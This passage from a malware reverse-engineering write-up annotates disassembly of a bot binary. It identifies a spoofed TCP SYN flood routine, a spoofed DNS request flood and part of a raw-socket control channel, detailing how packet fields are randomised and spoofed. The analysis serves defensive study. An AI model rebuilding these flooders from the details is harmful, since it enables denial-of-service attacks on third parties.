it is realised that 0xffffffa8(%ebp) marks the start of a commonly used 'pseudo' header. Earlier, values matching a protocol, tcp_length, and destination address (if hostname wasn't used) were placed in this location. It is not proven beyond doubt that this memory location is indeed a pseudo header (used for generating the tcp checksum), but it should definately be looked out for when the checksumming functions occur. 0x8049f53: movl $0x9c40,%esi %esi is the counter spoken of earlier. This is the point that sets the counter, indicating that a hostname has just been resolved. 0x8049f5b: cmpl $0x0,0xffffff34(%ebp) 0x8049f62: jne 0x8049ef0 0xffffff34(%ebp) appears to be used an an indicator that gethostbyname() failed (if it was called). It was earlier set to 0, and should remain 0 unless gethostbyname was called and failed. As such, if it is 0: 0x8049f64: call 0x8056058 This is a random() call, and is followed by MOD 0xc11 code. Following this: 0x8049f73: addb $0x2,%ah 0x8049f76: xchgb %al,%ah 0x8049f78: movw %ax,0xffffffcc(%ebp) 512 is added to %eax, and the %al and %ah exchanged (htons()'d). The result is placed into 0xffffffcc(%ebp) which should be the IP header ID field. Effectively, this should make this field between 512 and 3600. The same process is done again, this time with a MOD 0x579, addw 0xc8. The value is inserted into the packet buffer: 0x8049f91: movw %ax,0xffffffea(%ebp) This matches up with the tcp window, making it between 200 and 1400. Yet again, the same process is followed, this time with a MOD 0x9c40, incw %ax. The data is placed: 0x8049fa8: movw %ax,0xffffffdc(%ebp) 0xffffffdc(%ebp) corresponds to the TCP header's source port, making it between 1 and 40000. Still the same process, with a MOD 0x2625a00, leal 0x1(%edx) this time. This is placed into 0xffffffe0(%ebp), the sequence number. The MOD and leal 0x1, will result in the sequence number being between 1 and 0x2625a00. And finally, once more we obtain a random number, MOD by 0x74, and 0x7d. The result is placed into 0xffffffd0(%ebp) which is the IP packet's TTL field, making it random between 125 and 240. Continuing: 0x8049fd9: cmpl $0x0,0x20(%ebp) 0x8049fdd: jne 0x804a01c 0x20(%ebp) is LongG. If this is 0, a long process is undertaken which leads to a result of a dotted quad string located at 0xffffff68(%ebp), made up of random octets (excluding 255 for each). Regardless of LongG, we continue: 0x804a01c: leal 0xffffff68(%ebp),%eax 0x804a022: pushl %eax 0x804a023: call 0x804ce8c 0x804a028: movl %eax,0xffffffd4(%ebp) 0x804a02b: movl %eax,0xffffffa8(%ebp) This passes the random dotted quad through inet_addr and places the result in two places, the IP header source address, and the believed pseudo IP source address. More setup: 0x804a02e: movw $0x0,0xffffffec(%ebp) 0x804a034: movw $0x0,0xffffffd2(%ebp) 0xffffffec(%ebp), the TCP checksum is set to 0. 0xffffffd2(%ebp), the IP checksum is set to 0. 0x804a03a: pushl $0x14 0x804a03c: leal 0xffffffb4(%ebp),%eax 0x804a03f: pushl %eax 0x804a040: leal 0xffffffdc(%ebp),%eax 0x804a043: pushl %eax 0x804a044: call 0x8056480 Misc_Data_Copy is called upon to copy 20 bytes from 0xffffffdc(%ebp) to 0xffffffb4(%ebp). We know that 0xffffffdc(%ebp) is the start of the TCP header. We do not know at this time what the size of the TCP header will be, but we assume 20 bytes. This 20 byte TCP header is copied to what would be the tcp header duplicate in the pseudo header (12 byte offset from 0xffffffa8(%ebp)). What is believed to be checksum code is started. What we look for is either 0xffffffa8(%ebp), or 0xffffffc8(%ebp) being used since these are the beginnings of the pseudo and ip headers. In looking over the code, %edx is used as a size field. It is initially set like this: 0x804a04c: movl $0x20,%edx Which seems to made 0x20 bytes initially looped through (while incrementing the 'checksum' by the value of each byte). The fact that this would appear to be calculating the checksum of 32 bytes gives it away as being the pseudo header checksum. Indeed, eventually: 0x804a0b5: movw %ax,0xffffffec(%ebp) This location directly corresponds to 16 bytes into the TCP header, confirming it is indeed the tcp checksum(calculated from the pseudo header). Following this checksum, another seems to be done: 0x804a0b9: movl $0x14,%edx Indicating 20 byte loop, and finally: 0x804a121: movw %ax,0xffffffd2(%ebp) Placing the result checksum into 0xffffffd2(%ebp), the IP checksum. We then setup for a call: 0x804a125: pushl $0x10 0x804a127: leal 0xfffffff0(%ebp),%eax 0x804a12a: pushl %eax 0x804a12b: pushl $0x0 0x804a12d: pushl $0x28 0x804a12f: leal 0xffffffc8(%ebp),%eax 0x804a132: pushl %eax 0x804a133: movl 0xffffff40(%ebp),%ebx 0x804a139: pushl %ebx 0x804a13a: call 0x8056c3c This call is sendto(). The first parameter is 0xffffff40(%ebp) as expected (the socket returned by socket() earlier). 0xffffffc8(%ebp) is the buffer address to be sent, which does match up to the 'packet buffer' than has been constructed all this time. The amount of data to be sent is 0x28 (40 bytes), and 0xfffffff0(%ebp) does match up to an AF_INET sockaddr structre that was defined very early in the function. The sendto() is followed by: 0x804a142: cmpl $0x0,0x34(%ebp) 0x804a146: jne 0x804a154 This checks LongL. If it is 0: 0x804a148: pushl $0x12c 0x804a14d: call 0x80555b0 0x804a152: jmp 0x804a165 It will call a usleep(0x12c). If LongL is not 0: 0x804a154: cmpl %edi,0x34(%ebp) 0x804a157: jne 0x804a170 0x804a159: pushl $0x12c 0x804a15e: call 0x80555b0 0x804a163: xorl %edi,%edi It will compare %edi, which appears to take on a role of a counter, to LongL. If the two are equal, a usleep(0x12c) is called, and the counter is reset. 0x804a165: decl %esi 0x804a169: jmp 0x8049ef0 %esi (used as a hostname re-resolve counter) is also decremented before it jumps back up into the loop. 0x804a170: incl %edi 0x804a171: jmp 0x8049ef0 If %edi is not equal to LongL, it will increment it and jump back into the loop. Disassembly Review: Another complex function, with a lot of duplicate code from the other network functions. Once again, the sprintf(X, "X.X.X.X",A,B,C,D) is used in conjunction with inet_addr to obtain long based IP addresses. A buffer seems to be used, dedicated to setting up a TCP packet. The fields of this buffer are filled in. If LongG is 0, the source IP is random (without any 255 octets), else the octets are set to the values contained in LongH, LongI, LongJ, and LongK. The tcp destination port seems to be set by LongE and LongF. LongL looks to be able to control the packets per second by using it as a comparison to a counter (%edi) to determine when a usleep() is called. If LongM is 0, the destination IP octets for the packets is set by LongA, LongB, LongC, and LongD. If LongM is not 0, the hostname in BufferA is looked up using gethostbyname(), and the first IP for it is used as the destination IP. This hostname is periodically resolved, the exact time between resolutions is unknown and will have to be done during run-time testing. The flags of the TCP packet do some strange actions to get them to a stable point. It would appear that the compiler (or author) did some strange actions upon them (some of which are voided). In analysising sections of the code, the bigger picture is lost. The outcome of the tcp flag section appears to be that 0xffffffe9(%ebp) is set straight out to be 0x2 (overruled previous unreliable andb actions). 0xffffffe8(%ebp) ends up being set to %al which is strangely enough, set to *0xffffffe9(%ebp) ANDB 0x50 ORB 0x50. The result of these operations will obviously leave 0xffffffe8(%ebp) to 0x50, it is just noteworthy to see the incredibly strange involvement of *0xffffffe9(%ebp). The outcome of these operations will leave the TCP doff field set to 5 (indicating a 20 byte tcp header), and all other flags 0 except SYN. Function Overview: Yet another 'packetting' function. This time an obvious SYN flooder. The attack is made rather potent by the randomising of many of the fields such as the TTL. The source address seems spoofable to completely random IP's, or a single IP. The destination port is settable to a unique port, while the source ports are always random. The only comfort a victim to this attack can take is that any ingress filtering done on obviously spoofed IP's should block a small amount of the attack. The amount of traffic generated by this function is variable by the blackhat. The amount is dependant upon LongL, however exact packet-per- second analysis versus this value will have to be done at runtime. Features of this attack: * TCP SYN flood. * Single victim. * Victim may be hostname-based. * Hostname can be re-looked up every X packets! * Completely random, or a single IP spoofed as source. * Attack speed is adjustable. The network traffic generated by this function will be examined in more detail in Network_Analysis_E. g) Network_Function_E [0x8049564] - (Network) Known Usage: function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp), *0xfffff005(%ebp), *0xfffff006(%ebp), *0xfffff007(%ebp), *0xfffff008(%ebp), *0xfffff009(%ebp), *0xfffff00a(%ebp), *0xfffff00b(%ebp), *0xfffff00c(%ebp), *0xfffff00d(%ebp), 0xffffbb44(%ebp)) Guesses at purpose: Once again, believed to be a 'packetting' function due to similar parameters and positioning. Naming Conventions: Parameters will be given the following names: function(LongA, LongB, LongC, LongD, LongE, LongF, LongG, LongH, LongI, LongJ, LongK, LongL, BufferA) Disassembly: Once again, many of the parameters are copied into localised variables. 0x80495b8: leal 0xffffffdc(%ebp),%edi 0x80495bb: movl $0x8067698,%esi 0x80495c0: cld 0x80495c1: movl $0x9,%ecx 0x80495c6: repz movsl %ds:(%esi),%es:(%edi) This sees to the copying of 9 longs from 0x8067698 to 0xffffffdc(%ebp). (gdb) x/36b 0x8067698 0x8067698: 0x15 0x00 0x00 0x00 0x15 0x00 0x00 0x00 0x80676a0: 0x14 0x00 0x00 0x00 0x15 0x00 0x00 0x00 0x80676a8: 0x15 0x00 0x00 0x00 0x19 0x00 0x00 0x00 0x80676b0: 0x14 0x00 0x00 0x00 0x14 0x00 0x00 0x00 0x80676b8: 0x14 0x00 0x00 0x00 These longs look remarkably similar to those from Network_Function_B, and it turns out the same source is used in both functions. Another data copy follows: 0x80495c8: leal 0xfffffde8(%ebp),%edi 0x80495ce: movl $0x80676bc,%esi 0x80495d3: cld 0x80495d4: movl $0x7d,%ecx 0x80495d9: repz movsl %ds:(%esi),%es:(%edi) This sees to the copy of 500 bytes from 0x80676bc to 0xfffffde8(%ebp). Once again, 0x80676bc was seen in Network_Function_B. Some variables are set up: 0x80495db: leal 0xfffff9d8(%ebp),%edi 0x80495e1: leal 0xfffff9ec(%ebp),%ebx 0x80495e7: movl %ebx,0xfffff988(%ebp) 0x80495ed: leal 0xfffff9f4(%ebp),%ebx 0x80495f3: movl %ebx,0xfffff984(%ebp) 0x80495f9: movw $0x2,0xfffffdd8(%ebp) 0x8049602: movw $0x0,0xfffffdda(%ebp) And now comes the start of the 'real' code: 0x804960b: cmpl $0x0,0x34(%ebp) 0x804960f: jne 0x8049645 0x34(%ebp) is LongL. If it is 0: 0x8049611: movzbl 0xfffff9a0(%ebp),%eax 0x8049618: pushl %eax 0x8049619: movzbl 0xfffff9a4(%ebp),%eax 0x8049620: pushl %eax 0x8049621: movzbl 0xfffff9a8(%ebp),%eax 0x8049628: pushl %eax 0x8049629: movzbl 0xfffff9ac(%ebp),%eax 0x8049630: pushl %eax 0x8049631: pushl $0x806768a 0x8049636: leal 0xfffff9b8(%ebp),%eax 0x804963c: pushl %eax 0x804963d: call 0x804f808 This is an sprintf() call, once again to form a dotted quad from LongA, LongB, LongC, and LongD at 0xfffff9b8(%ebp). Another condition is done after the completion of the last. LongI is checked: 0x8049645: cmpl $0x0,0x28(%ebp) 0x8049649: je 0x804964e 0x804964b: decl 0x28(%ebp) If it is non-zero, it is decremented. 0x804964e: pushl $0xff 0x8049653: pushl $0x3 0x8049655: pushl $0x2 0x8049657: call 0x8056cf4 0x804965c: movl %eax,0xfffff98c(%ebp) A socket() call with the same parameters as in previous network functions. The socket descriptor is stored into 0xfffff98c(%ebp). 0x8049665: testl %eax,%eax 0x8049667: jle 0x80499d8 It is then tested to see if the socket() call was successful. If so, it continues: 0x804966d: movl $0x0,0xfffff980(%ebp) 0x8049677: movl $0x0,0xfffff97c(%ebp) 0x8049681: pushl $0x400 0x8049686: pushl $0x0 0x8049688: pushl %edi 0x8049689: call 0x8057764 This function is believed to be a memset() and that assumption still holds true. %edi was earlier set to 0xfffff9d8(%ebp). This call should result in the 400 bytes starting at 0xfffff9d8(%ebp) being set to 0. Continuing: 0x8049694: xorl %esi,%esi 0x8049696: cmpl $0x0,0x34(%ebp) 0x804969a: je 0x80496fc 0x804969c: cmpl $0x0,0xfffff97c(%ebp) 0x80496a3: jg 0x80496fc %esi is set to 0 (perhaps indicating a loop). Two conditions are then checked (much like in previous functions). Firstly, LongL is checked to be non-zero, and then 0xfffff97c(%ebp) to be <= 0. 0xfffff97c(%ebp) was recently set to 0 (this check probably occurs within a loop so only the first iteration would be 0). If both of these conditions are true: 0x80496a5: movl 0x38(%ebp),%ebx 0x80496a8: pushl %ebx 0x80496a9: call 0x804bf80 BufferA is pushed and gethostbyname() is called. This exact same code has been seen several times before. If gethostbyname() fails, a sleep(600) is done, and %esi is set to 1. If it succeeds, the first IP address of the hostname in BufferA is copied to 0xfffff9b4(%ebp). This address is then copied: 0x80496e6: movl %eax,0x10(%edi) 0x80496e9: movl %eax,0xfffffddc(%ebp) Looking back, %edi should be 0xfffff9d8(%ebp). So the IP address is copied into 0xfffff9e8(%ebp). The address is also copied into 0xfffffddc(%ebp). Another interesting thing to happen: 0x80496ef: movl $0x9c40,0xfffff97c(%ebp) This same number has been seen in other functions as a 'counter' that will is set to 0x9c40 after each successful gethostbyname(). It is decremented at timed intervals in other functions at which time when it reached 0, it would redo the gethostbyname(). Looking at 0x804969c, this function will most probably be identical in operation. We then exit out of the above conditionals and continue: 0x80496fc: testl %esi,%esi 0x80496fe: jne 0x8049694 %esi was earlier xorl'd to 0, and should only be 1 if gethostbyname() was called and failed (as seen in other functions). If %esi is 0: %esi is interestingly re-xorl'd to 0. This might indicate it forms a new purpose for the remainder of this conditional. A new conditional: 0x8049708: cmpl $0x0,0x34(%ebp) 0x804970c: jne 0x8049723 Once again, checking LongL. If it is 0: 0x804970e: leal 0xfffff9b8(%ebp),%eax 0x8049714: pushl %eax 0x8049715: call 0x804ce8c 0x804971a: movl %eax,0xfffffddc(%ebp) 0x804ce8c is an inet_addr() call, and 0xfffff9b8(%ebp) was earlier dot quadded by the sprintf() call at 0x804963d. The resultant long is placed into 0xfffffddc(%ebp). Regardless of LongL: 0x8049723: movl 0xfffff978(%ebp),%edx 0x8049729: addl $0xfffffde8,%edx 0x804972f: movl 0xffffffdc(%ebp,%esi,4),%eax 0x8049733: pushl %eax 0x8049734: pushl %edx 0x8049735: movl 0xfffff984(%ebp),%ebx 0x804973b: pushl %ebx 0x804973c: call 0x805652c The call to 0x805652c is unknown, but was briefly looked at in Data_Function_B. It was assertained there that it formed a data copy loop. In looking back at the analysis done at Data_Function_B, this call *should* result in *0xffffffdc(%ebp,%esi,4) bytes being copied from *0xfffff978(%ebp)+$0xfffffde8 to *0xfffff984(%ebp). Looking up all these values reveals that 0xffffffdc is the list of 9 longs, each with values between 20 and 25. 0xfffff978(%ebp) was earlier quite oddly set to %ebp. This means that $0xfffffde8 is quite effectively a stack address! It should be noted that 0xfffff978(%ebp) will quite likely change for later iterations. 0xfffffde8(%ebp) is the beginning of the 500 bytes of data copied at the very beginning of this network function. The destination for the data copy is unknown at this point in time. This function is followed by a random call() with: 0x8049749: movl $0xff,%ebx 0x804974e: cltd 0x804974f: idivl %ebx,%eax 0x8049751: movl 0xfffff984(%ebp),%ebx 0x8049757: movb %dl,(%ebx) This should put a random byte (with exception of 0xFF) into 0xfffff984(%ebp). Interestingly enough, this is the first byte of the data that we just finished copying! The same process is done again, but this time: 0x804976c: movb %dl,0x1(%ebx) It fills in the second byte of that same data buffer with another random value. A parameter check: 0x804976f: cmpl $0x0,0x2c(%ebp) 0x8049773: jne 0x804978c 0x8049775: cmpl $0x0,0x30(%ebp) 0x8049779: jne 0x804978c This checks if LongJ and LongK are 0, if so: We do the random() call with a MOD 0x7530. The result is placed into %eax and execution is jumped to 0x8049796. If LongJ or LongK is not 0: 0x804978c: movl 0x2c(%ebp),%eax 0x804978f: shll $0x8,%eax 0x8049792: addw 0x30(%ebp),%ax The two parameters, LongJ and LongK make up the high and low order bytes of %ax. So depending if LongJ and LongK are 0, %ax has a random value (up to 0x7530), and if either is non-zero, %ax is filled with their values. Once this is done: 0x8049796: xchgb %al,%ah 0x8049798: movl 0xfffff988(%ebp),%ebx 0x804979e: movw %ax,(%ebx) %ax is effectively htons()'d, and the value placed into *0xfffff988(%ebp). 0xfffff988(%ebp) was earlier set to 0xfffff9ec(%ebp). Other network functions have used this technique to operate with ports. It is assumed 0xfffff9ec(%ebp) is a port, but still no further assumptions can be made since we still dont know if we are making a UDP or TCP packet, the port could be destination or source, or even a sockaddr port (has been done before). Continuing: 0x80497a1: movl 0xfffff988(%ebp),%ebx 0x80497a7: movw $0x3500,0x2(%ebx) This is interesting, primarily because it is 2 bytes after the 'port' number we just placed at 0xfffff988. 0x35 is easily recognisable as port 53. We were earlier dealing with the same data that was used in Network_Function_B for DNS based purposes, so it is quite likely that This is the destination port, and the previous was a source port, all being constructed once again in a 'packet buffer'. Still with no hard evidence, we continue: 0x80497ad: movw 0xffffffdc(%ebp,%esi,4),%ax 0x80497b2: addw $0x8,%ax 0x80497b6: xchgb %al,%ah 0x80497b8: movw %ax,0x4(%ebx) 0x80497bc: movw $0x0,0x6(%ebx) Firstly, %ax is filled with one of those 9 20-25 values which start at 0xffffffdc. %esi is obviously used as an index which is initially 0. 8 is added to the value, then htons()'d, and finally stored at 0x4(%ebx). A 0 word is placed after that. This almost confirms that a udp header was just created. Evidence being the addition of 8 to the number (which was used as a datasize in Network_Function_B) and the placement into what would be the length field of the udp header. The 0 would correspond to the checksum. A series of checks (in an OR line-up): 0x80497c2: cmpb $0x0,0xfffff99c(%ebp) 0x80497c9: jne 0x804983c 0x80497cb: cmpb $0x0,0xfffff998(%ebp) 0x80497d2: jne 0x804983c 0x80497d4: cmpb $0x0,0xfffff994(%ebp) 0x80497db: jne 0x804983c 0x80497dd: cmpb $0x0,0xfffff990(%ebp) 0x80497e4: jne 0x804983c The locations checked correspond to the local copies of the parameters (which were duplicated at the very beginning of the function). The exact parameters are believed to be: LongE, LongF, LongG, LongH. If all of these are zero, a long series of random() calls are done in conjunction with setae's (setnc's) / andb masks. The outcome of this process is the creation of 4 bytes 0-254. These bytes are placed into 0xfffff9e4(%ebp) to 0xfffff9e7(%ebp). If any of the above checks are non-zero: 0x804983c: movb 0xfffff99c(%ebp),%bl 0x8049842: movb %bl,0xfffff9e4(%ebp) 0x8049848: movb 0xfffff998(%ebp),%bl 0x804984e: movb %bl,0xfffff9e5(%ebp) 0x8049854: movb 0xfffff994(%ebp),%bl 0x804985a: movb %bl,0xfffff9e6(%ebp) 0x8049860: movb 0xfffff990(%ebp),%bl 0x8049866: movb %bl,0xfffff9e7(%ebp) The values are quite simply placed directly into those memory locations instead of random values. Following on: 0x804986c: cmpl $0x0,0x34(%ebp) 0x8049870: jne 0x80498a2 LongL is checked, if it is 0: 0x8049872: movb 0xfffff9ac(%ebp),%bl 0x8049878: movb %bl,0xfffff9e8(%ebp) 0x804987e: movb 0xfffff9a8(%ebp),%bl 0x8049884: movb %bl,0xfffff9e9(%ebp) 0x804988a: movb 0xfffff9a4(%ebp),%bl 0x8049890: movb %bl,0xfffff9ea(%ebp) 0x8049896: movb 0xfffff9a0(%ebp),%bl 0x804989c: movb %bl,0xfffff9eb(%ebp) A very similar data copy takes place, 4 bytes after the previous data positions (Its fairly likely these will be IP addresses, but until more packet details are uncovered, its useless analysing them). Now comes the packet details we've been waiting for: 0x80498a2: movb $0x45,(%edi) The 0x45 are assumed to correspond to an ihl and ip version of an IP header. Once again, we will assume a packet buffer is in the making. %edi would be the starting point, and was earlier set to 0xfffff9d8(%ebp). This means the previous data copies to addresses starting at 0xfffff9e4(%ebp) would correspond to the source address, then the destination address. While the IP header protocol field has not yet been set, a UDP header seems to be in place, along with a copy of data into an appropriate udp-data position. We should expect to see packet buffer configured as UDP. A random() call followed by MOD 0x82 code is then done. The result has 0x78 added and: 0x80498b5: movb %dl,0x8(%edi) Is placed into the TTL position. This means any TTL will be between 120 and 250. Similar code again, this time the random number is MOD 255'd, then: 0x80498c5: movw %dx,0x4(%edi) Directly placed into the IP ID field (note the lack of htons()). 0x80498c9: movb $0x11,0x9(%edi) 0x80498cd: movw $0x0,0x6(%edi) Finally, we see the IP protocol field be set to 17 (UDP) as expected. This is followed by the IP offset being set to 0. Packet length calculations follow: 0x80498d3: movw 0xffffffdc(%ebp,%esi,4),%ax 0x80498d8: addw $0x1c,%ax 0x80498dc: xchgb %al,%ah 0x80498de: movw %ax,0x2(%edi) The first line grabs the indexed data length (indexed by %esi). 0x1c is added, this is the size of a 20 byte IP header plus an 8 byte UDP header. The value it htons()'d and stored into the IP header total length field. 0x80498e2: movw $0x0,0xa(%edi) 0xa(%edi) corresponds to the checksum, so the above line sets it to 0. The checksum process is then believed to start: 0x80498e8: movl $0x14,%edx Once again, forming a loop of 0x14 iterations (to process 20bytes). The starting position is set to 0xfffff9d8(%ebp) which is the start of the packet buffer. Eventually, we see: 0x8049951: movw %ax,0xa(%edi) Which sets the IP checksum. This is followed by a call setup: 0x8049955: pushl $0x10 0x8049957: leal 0xfffffdd8(%ebp),%eax 0x804995d: pushl %eax 0x804995e: pushl $0x0 0x8049960: movl 0xffffffdc(%ebp,%esi,4),%eax 0x8049964: addl $0x1c,%eax 0x8049967: pushl %eax 0x8049968: leal 0xfffff9d8(%ebp),%eax 0x804996e: pushl %eax 0x804996f: movl 0xfffff98c(%ebp),%ebx 0x8049975: pushl %ebx 0x8049976: call 0x8056c3c This is a simple sendto() call. It uses 0xfffff9d8(%ebp) as the send buffer (as expected), and 0xfffff98c(%ebp) as the socket. 0x1c plus the data amount is the total number of bytes to be sent (as expected). 0xfffffdd8(%ebp) marks a sockaddr structure which was setup under an AF_INET family, with a port of 0, and address of the destination host. Following this call, we see identical code to that which has been seen before. The code responsible for timing sleep()'s and resolving of BufferA (if chosen): 0x804997e: cmpl $0x0,0x28(%ebp) 0x8049982: jne 0x8049990 0x8049984: pushl $0x12c 0x8049989: call 0x80555b0 0x804998e: jmp 0x80499af 0x8049990: movl 0x28(%ebp),%ebx 0x8049993: cmpl %ebx,0xfffff980(%ebp) 0x8049999: jne 0x80499bc 0x804999b: pushl $0x12c 0x80499a0: call 0x80555b0 0x80499a5: movl $0x0,0xfffff980(%ebp) 0x80499af: decl 0xfffff97c(%ebp) 0x80499b8: jmp 0x80499c2 Basically, if LongI 0, it will usleep(0x12c). If not, it will check LongI to see if it matches the value at 0xfffff980(%ebp). If it does, it will usleep(0x12c), reset 0xfffff980(%ebp) back to 0, and decrement 0xfffff97c(%ebp) (a variable which upon reaching 0, indicates BufferA should be re-gethostbyname()'d). This host resolution variable is decremented if LongI is 0 aswell. If LongI is non-zero AND it does not equal the value at 0xfffff980(%ebp), then this value is simply incremented. 0x80499bc: incl 0xfffff980(%ebp) 0x80499c2: addl $0x32,0xfffff978(%ebp) Several variables are incremented. The first is not recognised, and has not been seen before [in fact does not seem to be used anywhere in the function!??!]. The second adds 50 to 0xfffff978(%ebp). This is the pointer to the data component of the packet. This effectively changes the UDP packet's contents. %esi's counter use now becomes clear: 0x80499c9: incl %esi 0x80499ca: cmpl $0x8,%esi 0x80499cd: jle 0x8049708 %esi is used to keep track of the 9 data type states. It will keep the loop going (by jumping back to 0x8049708) until %esi hits 9. At which time: 0x80499d3: jmp 0x8049694 Execution passes back further to cater for the gethostbyname() section. It should be remembered that 9 x 50 bytes of data (500 bytes) were copied in the beginning of the function. Also 9 longs were copied. This accounts for these 9 states, ensuring that it cycles through each. Disassembly Review: This function seems related to Network_Function_B, both in complexity, data, and purpose. The basic theme behind this function is to send packets to a single server, using the octets from LongA, LongB, LongC, and LongD. An optional source looks to be able to be specified. If LongE, LongF, LongG, and LongH are all 0, random source IP's will be generated for every outgoing packet. If any of them are non-zero, then they will be used as the source IP octets for every packet. LongI seems to be used for timing, determining how many packets are sent per second. LongJ and LongK look to be used solely for setting the source port of the attack. If they are both 0, a random source port 0-0x7530 will be used. LongL and BufferA are used in an identical way to the other network functions. If LongL is 0, LongA-D are used as destination IP. If LongL is non-zero, BufferA is used as a hostname to be looked up to obtain the IP address. The most interesting part of this function has been seen before in Network_Function_B. That is, the cycling through of the 9 packet data contents (and lengths). The purpose of which will surely be uncovered in Network_Analysis_F Function Overview: If Network_Function_B is indeed a DNS amplification attack as suspected, then this attack is expected to consume bandwidth on a DNS serving machine. It launches an attack against a single server, being able to spoof DNS requests from random addresses. Features of this attack: * DNS request flood. * Single victim. * Victim may be hostname-based. * Hostname can be re-looked up every X seconds(minutes)! * Completely random, or a single IP spoofed as source. * Request source port can be manually set, or random. * Attack speed is adjustable. The network traffic generated by this function will be examined in more detail in Network_Analysis_F. h) Network_Function_F [0x8048f94] - (Network) Known Usage: function(Buffer1, Buffer2, Buffer3, number) Guesses at purpose: From the positioning of this function, it is believed it will be responsible for some communications channel from this binary, to the blackhat. Naming Conventions: Parameters will be given the following names: function(IP_Address, BufferA, BufferB, DataAmount) IP_Address is named as such since the buffer only looks to be modified in one position at the moment. That is, in the case sections of the "Core Functionality" where it is set to the destination IP of an incoming packet. Disassembly: Straight into it: 0x8048fa0: pushl $0xff 0x8048fa5: pushl $0x3 0x8048fa7: pushl $0x2 0x8048fa9: call 0x8056cf4 0x8056cf4 has already been identified as a socket() call. Matching it up to a C function call: socket(AF_INET, SOCK_RAW, IPPROTO_RAW) Next we check the result: 0x8048fae: movl %eax,0xffffffbc(%ebp) 0x8048fb4: cmpl $0xffffffff,%eax 0x8048fb7: je 0x8048fce The socket number is placed into 0xffffffbc(%ebp). It is then checked if it is -1 (fail) and if so, jumps to 0x8048fce, else: 0x8048fb9: movl 0x14(%ebp),%eax 0x8048fbc: addl $0x17,%eax 0x8048fbf: pushl %eax 0x8048fc0: call 0x805bd74 0x8048fc5: movl %eax,%esi This function call is unknown, and disassembling it doesn't help to uncover its purpose. It does not seem to do anything of much importance so it will just be left as an unknown for now. As a parameter, DataAmount+23 is passed and the return is recorded in %esi. This value is tested: 0x8048fca: testl %esi,%esi 0x8048fcc: jne 0x8048fd8 If the return was 0, the network function returns with 0. Otherwise: 0x8048fd8: movl %esi,0xffffffc4(%ebp) 0x8048fdb: leal 0x14(%esi),%edi 0x8048fde: movl %edi,0xffffffc0(%ebp) 0x8048fe1: leal 0x16(%esi),%edi 0x8048fe4: movl %edi,0xffffffc8(%ebp) %esi is obviously recorded, and a few pointers appear to be setup at offsets of 20 and 22 bytes from it. These are also recorded. 0x8048fe7: movl 0x8(%ebp),%edi The very first parameter, IP_Address (points to a buffer containing an IP address) is copied to %edi. A slow (but simple) technique is then used: 0x8048fea: movb (%edi),%al 0x8048fec: movb %al,0xc(%esi) 0x8048fef: movb 0x1(%edi),%al 0x8048ff2: movb %al,0xd(%esi) 0x8048ff5: movb 0x2(%edi),%al 0x8048ff8: movb %al,0xe(%esi) 0x8048ffb: movb 0x3(%edi),%al 0x8048ffe: movb %al,0xf(%esi) This makes the 4 bytes (length of an IP address) be copied from this buffer to a buffer starting at 0xc(%esi). We do it all over again: 0x8049001: movb (%ebx),%al 0x8049003: movb %al,0x10(%esi) 0x8049006: movb 0x1(%ebx),%al 0x8049009: movb %al,0x11(%esi) 0x804900c: movb 0x2(%ebx),%al 0x804900f: movb %al,0x12(%esi) 0x8049012: movb 0x3(%ebx),%al 0x8049015: movb %al,0x13(%esi) A quick look back at 0x8048f9d shows that %ebx should be equal to *0xc(%ebp) (BufferA). Once again, more memory copying takes place, continuing on from earlier. A long setup and call is done: 0x8049018: movzbl 0x3(%ebx),%eax 0x804901c: pushl %eax 0x804901d: movzbl 0x2(%ebx),%eax 0x8049021: pushl %eax 0x8049022: movzbl 0x1(%ebx),%eax 0x8049026: pushl %eax 0x8049027: movzbl (%ebx),%eax 0x804902a: pushl %eax 0x804902b: pushl $0x806768a 0x8049030: leal 0xffffffd0(%ebp),%ebx 0x8049033: pushl %ebx 0x8049034: call 0x804f808 This code has been seen before, and simply uses sprintf() to form a dotted quad located at 0xffffffd0(%ebp). The octets for this are taken from a single buffer (thats something new), BufferA. 0x8049039: pushl %ebx 0x804903a: call 0x8049138 This function is unknown but looks to contain calls to gethostbyname() and a data copying function that was seen earlier. Following a successful gethostbyname() chain through the call shows it to return the first IP address matching the hostname in the parameter. One must question why this function is used here where a simple inet_addr() would suffice (as had been done in earlier functions). The return is copied: 0x804903f: movl %eax,0xfffffff4(%ebp) And some more values are placed nearby: 0x8049042: movw $0xa,0xfffffff2(%ebp) 0x8049048: movw $0x2,0xfffffff0(%ebp) This could well be a sock_addr structure, if the port was set to 0xa? Now the old favourites show their faces: 0x804904e: movb $0x45,(%esi) 0x8049051: movb $0xfa,0x8(%esi) 0x8049055: movb $0xb,0x9(%esi) %esi was earlier set to the return by a function call to 0x805bd74. It is quite possible this function was some kind of malloc(or even malloc itself!). Whatever it was, it would appear a packer buffer is being created, starting at %esi. Firstly, we see the well known 0x45 IP version / internet header length combination placed at the start. This is followed by 0xfa being placed in the IP TTL section. Following this, the IP protocol is set to 0xb (11). This is the same protocol that was listened to in the main() section of this binary. More packet setup: 0x804905c: movw 0x14(%ebp),%ax 0x8049060: addw $0x16,%ax 0x8049064: xchgb %al,%ah 0x8049066: movw %ax,0x2(%esi) This places the value from DataAmount + 0x16, after being htons()'d, into total length field of the IP header. 0x804906a: movb $0x0,0x1(%esi) 0 is placed into the IP TOS field. random() is called, the return xchg()'d: 0x804906e: call 0x8056058 0x8049073: xchgb %al,%ah 0x8049075: movw %ax,0x4(%esi) And finally added into the IP ID field. 0x8049079: movw $0x0,0x6(%esi) 0x804907f: movw $0x0,0xa(%esi) The IP offset is set to 0, same with the checksum. Starting at 0x8049085, checksum code appears to be started, looping across 20 bytes (the ip header). Eventually: 0x80490cf: movw %ax,0xa(%edi) The checksum is put into place, followed by: 0x80490d3: movl 0xffffffc0(%ebp),%edi 0x80490d6: movb $0x3,(%edi) 0xffffffc0(%ebp) is referenced much earlier, and was set to an offset of 0x14 bytes from %edi would have been above. This means this would correspond to directly after the IP header. A value of 0x3 is placed into this position. A function is setup and called: 0x80490d9: movl 0x14(%ebp),%edi 0x80490dc: pushl %edi 0x80490dd: movl 0x10(%ebp),%edi 0x80490e0: pushl %edi 0x80490e1: movl 0xffffffc8(%ebp),%edi 0x80490e4: pushl %edi 0x80490e5: call 0x805652c Once again, 0x805652c is a call to some kind of data copy function. Using a previous analysis of it, DataAmount bytes would be copied from BufferB to *0xffffffc8(%ebp). The destination was earlier set to 0x16(%esi), which corresponds to 2 bytes after the IP header. With the data copied, it seems a sendto() is next: 0x80490ed: pushl $0x10 0x80490ef: leal 